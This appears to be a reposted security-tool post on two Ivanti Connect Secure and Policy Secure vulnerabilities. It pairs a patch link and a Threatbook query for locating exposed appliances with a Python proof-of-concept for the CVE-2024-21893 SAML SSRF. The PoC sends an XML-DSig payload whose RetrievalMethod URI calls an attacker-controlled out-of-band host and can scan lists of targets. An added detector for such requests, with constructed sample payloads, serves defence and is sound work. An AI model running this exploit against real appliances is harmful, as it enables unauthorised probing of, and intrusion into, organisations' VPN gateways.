[1 February 2024] Ivanti has disclosed two high-severity vulnerabilities, CVE-2024-21888 (privilege escalation) and CVE-2024-21893 (SSRF); Threatbook supports searching for the affected components.
[Impact]: CVE-2024-21888 is a privilege escalation vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure that allows a user to elevate their privileges to those of an administrator.
CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component that allows an attacker to access certain restricted resources without authentication.
1. [Patch link]: https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
2. [Threatbook query syntax]: app="Ivanti-Connect-Secure" app="Ivanti-Policy-Secure"
3. Using the tool
Run: python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com (the -a value is an out-of-band listener such as a Burp Collaborator/oastify host; a vulnerable appliance fetching the ds:RetrievalMethod URI shows up there as a callback, and that callback, not the HTTP response code, is the actual confirmation).
```python
import argparse
from urllib.parse import urlparse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Appliances usually present a self-signed or internal certificate, so TLS
# verification is disabled below and the resulting warning is silenced.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def ensure_http(url):
    """Default to HTTPS when the target is given as a bare host name."""
    if not url.startswith("http://") and not url.startswith("https://"):
        return f"https://{url}"
    return url


def send_poc(target_url, attacker_server):
    # SOAP envelope carrying an XML-DSig KeyInfo whose ds:RetrievalMethod URI
    # points at the attacker-controlled server. A vulnerable SAML component
    # dereferences that URI server-side (the SSRF), which is observed as an
    # out-of-band callback on the attacker server.
    payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="{attacker_server}"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>"""
    target_url = ensure_http(target_url)
    payload = payload_template.format(attacker_server=attacker_server)
    parsed_url = urlparse(target_url)
    # Use the SAML web-service endpoint unless an explicit path was supplied.
    full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws"
    host = parsed_url.netloc
    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        "Content-Length": str(len(payload)),
    }
    print(f"Sending PoC to {target_url}...")
    response = requests.post(f"{parsed_url.scheme}://{host}{full_path}",
                             data=payload, headers=headers, verify=False)
    # The status code alone proves nothing; the signal is a hit on the
    # attacker server.
    print(f"  -> HTTP {response.status_code}; check {attacker_server} for a callback")


def main():
    parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    parser.add_argument('-u', '--url', type=str, help='Single target URL')
    parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    parser.add_argument('-a', type=str, required=True, help='Attacker server URL')
    args = parser.parse_args()

    if args.url:
        send_poc(args.url, args.a)
    elif args.list:
        with open(args.list, 'r') as file:
            for line in file:
                target = line.strip()
                if target:
                    send_poc(target, args.a)
    else:
        print("No target specified. Use -u for a single target or -l for a list of targets.")


if __name__ == "__main__":
    main()
```
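The defensive counterpart to the PoC above, as an added example that is not part of the original post or of Ivanti's code: it inspects a captured request to the SAML endpoint and flags any ds:RetrievalMethod or ds:Reference URI that would make the appliance fetch from a host outside an allowlist, which is exactly the shape of the CVE-2024-21893 probe. The endpoint path is the one the PoC uses; the allowlisted IdP host, the callback host and both sample bodies are constructed for illustration. It uses the standard library's ElementTree for portability; a production parser should be defusedxml, which also refuses entity-expansion bombs.

```python
"""Flag SAML SOAP requests carrying an external XML-DSig retrieval URI
(the CVE-2024-21893 SSRF pattern). Added example, not the post's own code;
endpoint path taken from the PoC, everything else constructed/assumed."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
# Endpoint targeted by the PoC on this page.
SAML_PATH = "/dana-ws/saml20.ws"
# Hosts the SAML component may legitimately fetch from (hypothetical IdP;
# replace with your own metadata/IdP hosts).
ALLOWED_HOSTS = {"idp.example.com"}


def retrieval_uris(body: str) -> list[str]:
    """Return, in document order, every URI attribute found on a
    ds:RetrievalMethod or ds:Reference element. A body that is not
    well-formed XML yields [] so the caller simply sees no hits."""
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return []
    wanted = {f"{{{DS_NS}}}RetrievalMethod", f"{{{DS_NS}}}Reference"}
    return [el.get("URI") for el in root.iter()
            if el.tag in wanted and el.get("URI")]


def is_external(uri: str, allowed_hosts: set[str]) -> bool:
    """True when dereferencing the URI would make the server reach outside
    the allowlist. Scheme-less references ("#id") are how XML-DSig normally
    links signed data and are not flagged; anything with a scheme (http,
    https, file, ...) whose host is not allowlisted is. file:// has no host,
    so it is flagged as well."""
    parsed = urlparse(uri)
    if not parsed.scheme:
        return False
    return (parsed.hostname or "") not in allowed_hosts


def scan_request(path: str, body: str,
                 allowed_hosts: set[str] = ALLOWED_HOSTS) -> dict:
    """Classify one captured POST. 'alert' is True when any external URI is
    present; 'known_endpoint' tells the analyst it hit the PoC's path."""
    path_only = path.split("?", 1)[0]
    hits = [u for u in retrieval_uris(body) if is_external(u, allowed_hosts)]
    return {
        "path": path_only,
        "known_endpoint": path_only == SAML_PATH,
        "external_uris": hits,
        "alert": bool(hits),
    }


# Constructed sample 1: the shape of the PoC request (callback host is made up).
ATTACK_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo/>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo>
        <ds:RetrievalMethod URI="http://callback.example.net/probe"/>
        <ds:X509Data/>
      </ds:KeyInfo>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>"""

# Constructed sample 2: a benign signature using same-document references only.
BENIGN_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:Reference URI="#_assertion1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>AAAA</ds:SignatureValue>
      <ds:KeyInfo>
        <ds:RetrievalMethod URI="#cert1"/>
      </ds:KeyInfo>
      <ds:Object Id="cert1"/>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>"""

if __name__ == "__main__":
    for name, body in (("attack", ATTACK_BODY), ("benign", BENIGN_BODY),
                       ("junk", "not xml")):
        print(name, scan_request(SAML_PATH + "?x=1", body))
```

Feed it the request path and body from a reverse proxy or full-packet capture in front of the appliance; an alert on the known endpoint with an external URI is a probe or exploitation attempt regardless of what status code the appliance returned.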
Originally published on the WeChat official account Web安全工具库: Privilege escalation vulnerability CVE-2024-21893 detection tool (updated 3 February)